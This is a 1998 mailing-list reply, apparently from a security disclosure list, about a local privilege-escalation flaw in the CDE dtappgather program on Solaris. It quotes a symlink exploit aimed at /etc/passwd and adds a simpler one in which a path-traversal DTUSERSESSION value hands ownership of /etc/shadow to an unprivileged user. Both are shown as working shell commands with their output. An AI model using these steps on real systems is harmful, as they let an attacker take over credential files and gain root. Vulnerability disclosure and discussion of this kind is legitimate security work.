X-RDate: Wed, 25 Feb 1998 13:14:50 +0500 (ESK)
Date: Tue, 24 Feb 1998 20:30:20 +0100
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
Subject: Re: /usr/dt/bin/dtappgather exploit
> I suppose you have learnt about CERT's advisory on dtappgather
> program. Well, here's the exploit:
> nigg0r@host% ls -l /etc/passwd
> -r--r--r-- 1 root other 1585 Dec 17 22:26 /etc/passwd
> nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
> nigg0r@host% dtappgather
the exploit is much simpler than that.
hey, it's even documented on the man page :-)
$ id
uid=6969(foo) gid=666(bar)
$ ls -l /etc/shadow
-r-------- 1 root sys 234 Nov 7 1999 /etc/shadow
$ env DTUSERSESSION=../../../../../../../etc/shadow dtappgather
$ ls -l /etc/shadow
-r-xr-xr-x 1 foo bar 234 Nov 7 1999 /etc/shadow
Anyway, your exploit has an advantage: it works (at least,
in solaris 2.5), even after patching CDE according to CERT
Solaris 2.6 seems to have the right permisions:
/var/dt -> rwxr-xr-x
/var/dt/appconfig -> rwxr-xr-x
/var/dt/tmp -> rwxrwxrwt
J.A. Gutierrez So be easy and free
when you're drinking with me
I'm a man you don't meet every day
finger me for PGP (the pogues)